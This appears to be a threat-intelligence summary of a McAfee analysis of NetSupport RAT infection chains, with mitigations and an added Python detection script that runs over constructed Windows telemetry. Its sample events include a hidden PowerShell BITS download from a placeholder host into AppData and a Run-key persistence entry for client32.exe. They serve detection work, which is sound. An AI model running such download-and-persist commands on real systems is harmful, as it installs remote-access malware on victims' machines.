Full Report
NetSupport malware variants have been a persistent threat, demonstrating adaptability and evolving infection techniques. In this technical analysis, we delve... The post Beneath the Surface: How Hackers Turn NetSupport Against Users appeared first on McAfee Blog.
Analysis Summary
# Main Topic
Technical analysis of evolving NetSupport malware variants, focusing on their infection chains, technical intricacies, and methods for establishing persistence and command and control (C2).
## Key Points
- NetSupport variants demonstrate adaptability, evolving distribution via obfuscated JavaScript files as the initial entry point.
- The malware leverages Windows native tools, using `wscript.exe` to invoke PowerShell for subsequent payload delivery.
- The final malicious payload is the NetSupport client binary, `client32.exe`, which establishes remote control.
- **Persistence:** Achieved by creating Windows Registry entries for automatic execution upon system startup.
- **Variant 1 Specifics:** Drops `client32.exe` in the `AppData\MsEdgeSandbox` folder. It utilizes `Start-BitsTransfer` or `bitsadmin` for file downloads.
- **Variant 2 Specifics:** Downloads a text file, decodes base64 content, creates a ZIP archive, and places `client32.exe` in the `AppData\D` folder.
- **C2 Communication:** Established by `client32.exe` using the NetSupport Manager protocol, often over port 1412, with the client identifying itself in its headers as "NetSupport Manager/1.3".
## Threat Actors
- Not explicitly attributed to a specific named threat actor group; the operators are characterized as cybercriminals who continually evolve the methods by which they deliver and abuse the NetSupport RAT.
## TTPs
- **Initial Access:** Delivery via obfuscated JavaScript files designed to bypass security mechanisms.
- **Execution:** Chaining execution from JavaScript to `wscript.exe` to PowerShell.
- **Defense Evasion:** Use of native tools (`wscript.exe`, PowerShell, `bitsadmin`) and file obfuscation (Base64 decoding in Variant 2).
- **Persistence:** Registering `client32.exe` for auto-startup via the Windows Registry.
- **Command and Control:** Establishing connection via `client32.exe` to remote addresses using port 1412, characteristic of NetSupport Manager.
## Affected Systems
- Windows operating systems (implied by the use of `wscript.exe`, PowerShell, and AppData directories).
- Systems targeted geographically across the United States and Canada.
## Mitigations
- Deploy security software that combines signature-based, machine-learning and behavior-based detection, so that execution chains involving PowerShell and suspicious file drops are identified and blocked.
- Monitor and inspect network traffic for communication on port 1412 associated with NetSupport Manager client headers.
- Implement controls to restrict or monitor execution from JavaScript/WScript environments that attempt to launch PowerShell or download external executables.
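The three mitigations above map directly onto the stages of the chain the post describes (script host to PowerShell, BITS download into AppData, Run-key persistence for `client32.exe`, and client traffic on port 1412). The following is an added example, not code from the McAfee post, showing how a defender might express those stages as simple detection rules and run them over telemetry. The events are constructed, Sysmon-style records, and the field names (`image`, `parent_image`, `cmdline`, `key`, `value`, `dst_port`, `client_header`) are assumptions chosen for this example rather than any product's schema.

```python
"""Toy detection rules for the NetSupport infection chain summarised above.

Added example, not code from the McAfee post. The events are constructed,
Sysmon-style records (process creation, registry value set, network
connection); the field names are assumptions chosen for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Set

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_MARKERS = ("start-bitstransfer", "bitsadmin")   # the two download tools named in the post
RUN_KEY_FRAGMENT = "\\currentversion\\run\\"             # HKCU/HKLM ...\CurrentVersion\Run\<name>
NETSUPPORT_PORT = 1412
NETSUPPORT_HEADER = "NetSupport Manager/"


@dataclass(frozen=True)
class Finding:
    stage: str      # execution | download | persistence | c2
    reason: str
    evidence: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict) -> List[Finding]:
    """Script host -> PowerShell, and PowerShell pulling a file into AppData via BITS."""
    out: List[Finding] = []
    child, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmd = ev["cmdline"]
    low = cmd.lower()
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        out.append(Finding("execution", "script host launched PowerShell", cmd))
    if child == "powershell.exe" and any(m in low for m in DOWNLOAD_MARKERS) and "appdata" in low:
        out.append(Finding("download", "BITS download into AppData from PowerShell", cmd))
    return out


def check_registry(ev: Dict) -> List[Finding]:
    """Run key whose value launches client32.exe from a user-writable AppData path."""
    key, value = ev["key"].lower(), ev["value"]
    if RUN_KEY_FRAGMENT in key and basename(value) == "client32.exe" and "appdata" in value.lower():
        return [Finding("persistence", "Run key points at client32.exe under AppData", ev["key"])]
    return []


def check_network(ev: Dict) -> List[Finding]:
    """NetSupport Manager client traffic: the default port or the client's own header."""
    hdr = ev.get("client_header", "")
    if ev.get("dst_port") == NETSUPPORT_PORT or hdr.startswith(NETSUPPORT_HEADER):
        evidence = f"port={ev.get('dst_port')} header={hdr!r}"
        return [Finding("c2", "NetSupport Manager client traffic", evidence)]
    return []


CHECKS = {"process": check_process, "registry": check_registry, "network": check_network}


def analyze(events: List[Dict]) -> List[Finding]:
    """Run every rule over every event and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        findings.extend(CHECKS.get(ev["type"], lambda _: [])(ev))
    return findings


def stages_seen(findings: List[Finding]) -> Set[str]:
    return {f.stage for f in findings}


def chain_complete(findings: List[Finding]) -> bool:
    """True when every stage of the chain described in the post was observed."""
    return stages_seen(findings) == {"execution", "download", "persistence", "c2"}


# Constructed telemetry for one simulated host, in the order the chain runs,
# followed by a benign PowerShell event that must not trigger anything.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "image": "C:\\Windows\\System32\\wscript.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\Downloads\\invoice.js"'},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "powershell -w hidden -c Start-BitsTransfer -Source http://example.invalid/a.zip "
                "-Destination $env:APPDATA\\MsEdgeSandbox\\a.zip"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MsEdgeSandbox",
     "value": "C:\\Users\\u\\AppData\\Roaming\\MsEdgeSandbox\\client32.exe"},
    {"type": "network", "image": "C:\\Users\\u\\AppData\\Roaming\\MsEdgeSandbox\\client32.exe",
     "dst_port": 1412, "client_header": "NetSupport Manager/1.3"},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.stage:<11}] {f.reason}: {f.evidence}")
    print("full chain observed:", chain_complete(results))
```

Each rule is deliberately narrow: a BITS transfer from PowerShell is common administrative behaviour, so the download rule only fires when the destination is under AppData, and the persistence rule requires both the Run key and a `client32.exe` under AppData. Correlating the stages per host (as `chain_complete` does) is what turns individually noisy signals into a confident detection of this particular chain.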
## Conclusion
NetSupport variants pose a persistent threat due to their reliance on layered infection techniques starting with highly obfuscated JavaScript. The immediate TTPs involve leveraging native Windows tools for stealthy payload delivery and establishing persistence via the Registry. Organizations must prioritize defense mechanisms that analyze execution chains (JS -> Script Host -> PowerShell) and block known C2 infrastructure associated with the NetSupport Manager RAT.